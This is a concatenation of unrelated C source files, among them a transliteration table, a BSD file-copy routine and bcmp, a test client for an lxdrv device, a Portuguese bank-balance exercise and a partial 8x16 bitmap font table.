"ty",0,0,"ghy","ghy","sy","sy","shy","shy","hy","hy","jy","jy","khy","khy","sy","sy","dy","dy","shj","shh","shkh","shm","shr","sr","sr","dr","ty","ty",0,0,"ghy","ghy","sy","sy","shy","shy","hy","hy","jy","jy","khy","khy","sy","sy","dy","dy","shj","shh","shkh","shm","shr","sr","sr","dr","shj","shh","shkh","shm","sh","shh","tm","sj","sh","skh","shj","shh","shkh","tm","zm",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"tjm","thj","thj","thm","tkhm","tmj","tmh","tmkh","jmh","jmh","hmy","hmy","shj","sjh","sjy","smh","smh","smj","smm","smm","shh","shh","smm","shhm","shhm","shjy","shmkh","shmkh","shmm","shmm","dhy","dkhm","dkhm","tmh","tmh","tmm","tmy",0,0,
0,0,"ghmm","ghmy","ghmy","fkhm","fkhm","qmh","qmm","lhm","lhy","lhy","ljj","ljj","lkhm","lkhm","lmh","lmh","mhj","mhm","mhy","mjh","mjm","mkhj","mkhm",0,0,"mjkh","hmj","hmm","nhm","nhy","njm","njm","njy","nmy","nmy","ymm","ymm","bkhy","tjy","tjy","tkhy","tkhy","tmy","tmy","jmy","jhy","jmy","skhy","shy","shhy","dhy","ljy","lmy","yhy","yjy","ymy","mmy","qmy","nhy","qmh","lhm",0,"kmy","njh","mkhy","ljm","kmm","ljm","njh","jhy","hjy","mjy","fmy","bhy","kmm",0,"smm","skhy","njy",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"allh","akbr","mhmd",0,"rswl",0,
"wslm","sly",0,0,"ryal",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"a",0,
"u",0,"i",0,0,0,0,0,"a","a","a","a","w","w","a","a","y","y","y","y","a","a","b","b","b","b","t","t","t","t","t","t","th","th","th","th","j","j","j","j","h","h","h","h","kh","kh","kh","kh","d","d","dh","dh","r","r","z","z","s","s","s","s","sh","sh","sh","sh","s","s","s","s","d","d","d","d","t","t","t","t","z","z","z","z",0,0,0,0,"gh","gh","gh","gh","f","f","f","f","q","q","q","q","k","k","k","k","l","l","l","l","m","m","m","m","n","n","n","n","h","h","h","h","w","w","y","y","y","y","y","y","la","la","la","la","la",
"la","la","la",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"0","1","2","3","4","5","6","7","8","9",0,0,0,0,0,0,0,"A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z",0,0,0,0,0,0,"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z",0,0,0,0,0,0,0,0,0,0,0,"wo",0,0,0,0,0,0,0,0,0,0,"a","i","u","e","o","ka","ki","ku","ke","ko",
"sa","shi","su","se","so","ta","chi","tsu","te","to","na","ni","nu","ne","no","ha","hi","fu","he","ho","ma","mi","mu","me","mo","ya","yu","yo","ra","ri","ru","re","ro","wa","n",0,0,0,"g","kk","gs","n","nj","nh","d","tt","l","lg","lm","lb","ls","lt","lp",0,"m","b","pp",0,"s","ss","","j","jj","ch","k","t","p","h",0,0,0,"a","ae","ya","yae","eo","e",0,0,"yeo","ye","o","wa","wae","oe",0,0,"yo","u","wo","we","wi","yu",0,0,"eu","ui","i",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,};
char * transform(int code) {
return (code >=0 && code <=65535) ? transChars[code] : 0;
}
|
the_stack_data/179830254.c | //combines two unsigned char values (valLow, valHigh) into one unsigned integer (value)
unsigned int combine(unsigned char valLow, unsigned char valHigh, unsigned int value) {
unsigned int result = valHigh << 24 | valLow << 16 | value;
return result;
} |
the_stack_data/74311.c | /*
* Copy data from one file to another for a length.
* Returns 1 on success, 0 on failure.
*/
#include <stdio.h>
copyd(ofp, ifp, len)
FILE *ofp, *ifp;
unsigned long len;
{
register n, r;
char buf[BUFSIZ];
for (n = ftell(ifp) % BUFSIZ; len; (len -= n), (n = 0)) {
if ((n = BUFSIZ - n) > len)
n = len;
if (!(r = fread(buf, 1, n, ifp)) ||
(r != fwrite(buf, 1, r, ofp)) ||
(r != n))
return (0);
}
return (1);
}
#ifdef TEST
#include <misc.h>
main(argc, argv)
char *argv[];
{
extern long atol();
if (argc != 4)
fatal("test to from length");
if (!copyd(xopen(argv[1], "w"), xopen(argv[2], "r"), atol(argv[3])))
fatal("Error in copy");
}
#endif
|
the_stack_data/53457.c | #include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/fcntl.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
__int32_t
main (
__int32_t ArgumentCount,
char* Arguments[]
)
{
__int32_t lxFd;
__int32_t error;
__int32_t testBuffer;
//
// Print banner and usage information
//
printf("LxDrvCli v1.0.0 -- (c) Copyright 2016 Alex Ionescu\n");
printf("Visit http://github.com/ionescu007/lxss for more information.\n\n");
if (ArgumentCount != 1)
{
printf("lxdrvcli\n");
printf("Opens /dev/lxdrv and sends it the 0xBEEF IOCTL\n");
return EINVAL;
}
//
// Open our device
//
lxFd = open("/dev/lxdrv", O_RDWR);
if (lxFd < 1)
{
printf("Couldn't open handle to lxdrv device: %s\n", strerror(errno));
return errno;
}
else
{
printf("Opened handle: %d\n", lxFd);
}
//
// Send it a random number, to prove it will override it
//
testBuffer = 50;
error = ioctl(lxFd, 0xBEEF, &testBuffer);
if (error != 0)
{
printf("IOCTL failed: %d %s\n", error, strerror(errno));
close(lxFd);
return errno;
}
//
// Show the output and close the file
//
printf("Response from driver: %d\n", testBuffer);
close(lxFd);
return 0;
}
|
the_stack_data/39346.c | /*
* Copyright (c) 1987, 1993
* The Regents of the University of California. All rights reserved.
*
* %sccs.include.redist.c%
*/
#if defined(LIBC_SCCS) && !defined(lint)
static char sccsid[] = "@(#)bcmp.c 8.1 (Berkeley) 06/04/93";
#endif /* LIBC_SCCS and not lint */
#include <string.h>
/*
* bcmp -- vax cmpc3 instruction
*/
int
bcmp(b1, b2, length)
const void *b1, *b2;
register size_t length;
{
register char *p1, *p2;
if (length == 0)
return(0);
p1 = (char *)b1;
p2 = (char *)b2;
do
if (*p1++ != *p2++)
break;
while (--length);
return(length);
}
|
the_stack_data/1061215.c | #include <stdio.h>
#include <stdlib.h>
int main ()
{
float saldo, credito, debito, novosaldo;
printf ("Informe seu saldo atual: \n");
scanf ("%f", &saldo);
printf ("Informe o valor a ser depositado: \n");
scanf ("%f", &credito);
printf ("Informe o valor do cheque a ser descontado: \n");
scanf ("%f", &debito);
novosaldo = saldo+credito-debito;
if (novosaldo>0)
{
printf ("Saldo positivo! Valor: %f \n", novosaldo);
}
else if (novosaldo<0)
{
printf ("Saldo negativo! Valor: %f \n", novosaldo);
}
else
{
printf ("Sua conta esta zerada! \n");
}
system ("pause");
return (0);
}
|
the_stack_data/40762006.c | int f()
{
int a;
int b;
a = 1;
b = 2;
return a+b;
}
|
the_stack_data/117239.c | #include <stdio.h>
int main(){
int a[2], b[2], i = 0;
a[0] = 0; a[1] = 1;
b[0] = 2; b[1] = 3;
a[i] = b[i++];
printf("%d %d %d %d\n", a[0], a[1], b[0], b[1]);
return 0;
} |
the_stack_data/9803.c | /**********************************************/
/* */
/* Font file generated by cpi2fnt */
/* */
/**********************************************/
#define FONTDATAMAX 4096
const unsigned char fontdata_8x16[FONTDATAMAX] = {
/* 0 0x00 '^@' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 1 0x01 '^A' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0x81, /* 10000001 */
0xa5, /* 10100101 */
0x81, /* 10000001 */
0x81, /* 10000001 */
0xbd, /* 10111101 */
0x99, /* 10011001 */
0x81, /* 10000001 */
0x81, /* 10000001 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 2 0x02 '^B' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0xff, /* 11111111 */
0xdb, /* 11011011 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xc3, /* 11000011 */
0xe7, /* 11100111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 3 0x03 '^C' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x6c, /* 01101100 */
0xfe, /* 11111110 */
0xfe, /* 11111110 */
0xfe, /* 11111110 */
0xfe, /* 11111110 */
0x7c, /* 01111100 */
0x38, /* 00111000 */
0x10, /* 00010000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 4 0x04 '^D' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x10, /* 00010000 */
0x38, /* 00111000 */
0x7c, /* 01111100 */
0xfe, /* 11111110 */
0x7c, /* 01111100 */
0x38, /* 00111000 */
0x10, /* 00010000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 5 0x05 '^E' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x3c, /* 00111100 */
0xe7, /* 11100111 */
0xe7, /* 11100111 */
0xe7, /* 11100111 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 6 0x06 '^F' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x7e, /* 01111110 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0x7e, /* 01111110 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 7 0x07 '^G' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 8 0x08 '^H' */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xe7, /* 11100111 */
0xc3, /* 11000011 */
0xc3, /* 11000011 */
0xe7, /* 11100111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
/* 9 0x09 '^I' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3c, /* 00111100 */
0x66, /* 01100110 */
0x42, /* 01000010 */
0x42, /* 01000010 */
0x66, /* 01100110 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 10 0x0a '^J' */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xc3, /* 11000011 */
0x99, /* 10011001 */
0xbd, /* 10111101 */
0xbd, /* 10111101 */
0x99, /* 10011001 */
0xc3, /* 11000011 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
/* 11 0x0b '^K' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x1e, /* 00011110 */
0x0e, /* 00001110 */
0x1a, /* 00011010 */
0x32, /* 00110010 */
0x78, /* 01111000 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x78, /* 01111000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 12 0x0c '^L' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3c, /* 00111100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 13 0x0d '^M' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3f, /* 00111111 */
0x33, /* 00110011 */
0x3f, /* 00111111 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x70, /* 01110000 */
0xf0, /* 11110000 */
0xe0, /* 11100000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 14 0x0e '^N' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7f, /* 01111111 */
0x63, /* 01100011 */
0x7f, /* 01111111 */
0x63, /* 01100011 */
0x63, /* 01100011 */
0x63, /* 01100011 */
0x63, /* 01100011 */
0x67, /* 01100111 */
0xe7, /* 11100111 */
0xe6, /* 11100110 */
0xc0, /* 11000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 15 0x0f '^O' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0xdb, /* 11011011 */
0x3c, /* 00111100 */
0xe7, /* 11100111 */
0x3c, /* 00111100 */
0xdb, /* 11011011 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 16 0x10 '^P' */
0x00, /* 00000000 */
0x80, /* 10000000 */
0xc0, /* 11000000 */
0xe0, /* 11100000 */
0xf0, /* 11110000 */
0xf8, /* 11111000 */
0xfe, /* 11111110 */
0xf8, /* 11111000 */
0xf0, /* 11110000 */
0xe0, /* 11100000 */
0xc0, /* 11000000 */
0x80, /* 10000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 17 0x11 '^Q' */
0x00, /* 00000000 */
0x02, /* 00000010 */
0x06, /* 00000110 */
0x0e, /* 00001110 */
0x1e, /* 00011110 */
0x3e, /* 00111110 */
0xfe, /* 11111110 */
0x3e, /* 00111110 */
0x1e, /* 00011110 */
0x0e, /* 00001110 */
0x06, /* 00000110 */
0x02, /* 00000010 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 18 0x12 '^R' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x7e, /* 01111110 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 19 0x13 '^S' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x00, /* 00000000 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 20 0x14 '^T' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7f, /* 01111111 */
0xdb, /* 11011011 */
0xdb, /* 11011011 */
0xdb, /* 11011011 */
0x7b, /* 01111011 */
0x1b, /* 00011011 */
0x1b, /* 00011011 */
0x1b, /* 00011011 */
0x1b, /* 00011011 */
0x1b, /* 00011011 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 21 0x15 '^U' */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0x60, /* 01100000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x6c, /* 01101100 */
0x38, /* 00111000 */
0x0c, /* 00001100 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 22 0x16 '^V' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0xfe, /* 11111110 */
0xfe, /* 11111110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 23 0x17 '^W' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x7e, /* 01111110 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 24 0x18 '^X' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x7e, /* 01111110 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 25 0x19 '^Y' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 26 0x1a '^Z' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x0c, /* 00001100 */
0xfe, /* 11111110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 27 0x1b '^[' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0xfe, /* 11111110 */
0x60, /* 01100000 */
0x30, /* 00110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 28 0x1c '^\' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 29 0x1d '^]' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x28, /* 00101000 */
0x6c, /* 01101100 */
0xfe, /* 11111110 */
0x6c, /* 01101100 */
0x28, /* 00101000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 30 0x1e '^^' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x10, /* 00010000 */
0x38, /* 00111000 */
0x38, /* 00111000 */
0x7c, /* 01111100 */
0x7c, /* 01111100 */
0xfe, /* 11111110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 31 0x1f '^_' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0xfe, /* 11111110 */
0x7c, /* 01111100 */
0x7c, /* 01111100 */
0x38, /* 00111000 */
0x38, /* 00111000 */
0x10, /* 00010000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 32 0x20 ' ' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 33 0x21 '!' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x3c, /* 00111100 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 34 0x22 '"' */
0x00, /* 00000000 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x24, /* 00100100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 35 0x23 '#' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0xfe, /* 11111110 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0xfe, /* 11111110 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 36 0x24 '$' */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc2, /* 11000010 */
0xc0, /* 11000000 */
0x7c, /* 01111100 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x86, /* 10000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 37 0x25 '%' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc2, /* 11000010 */
0xc6, /* 11000110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0xc6, /* 11000110 */
0x86, /* 10000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 38 0x26 '&' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x38, /* 00111000 */
0x76, /* 01110110 */
0xdc, /* 11011100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 39 0x27 ''' */
0x00, /* 00000000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 40 0x28 '(' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x0c, /* 00001100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 41 0x29 ')' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 42 0x2a '*' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x66, /* 01100110 */
0x3c, /* 00111100 */
0xff, /* 11111111 */
0x3c, /* 00111100 */
0x66, /* 01100110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 43 0x2b '+' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 44 0x2c ',' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 45 0x2d '-' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 46 0x2e '.' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 47 0x2f '/' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x02, /* 00000010 */
0x06, /* 00000110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0xc0, /* 11000000 */
0x80, /* 10000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 48 0x30 '0' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
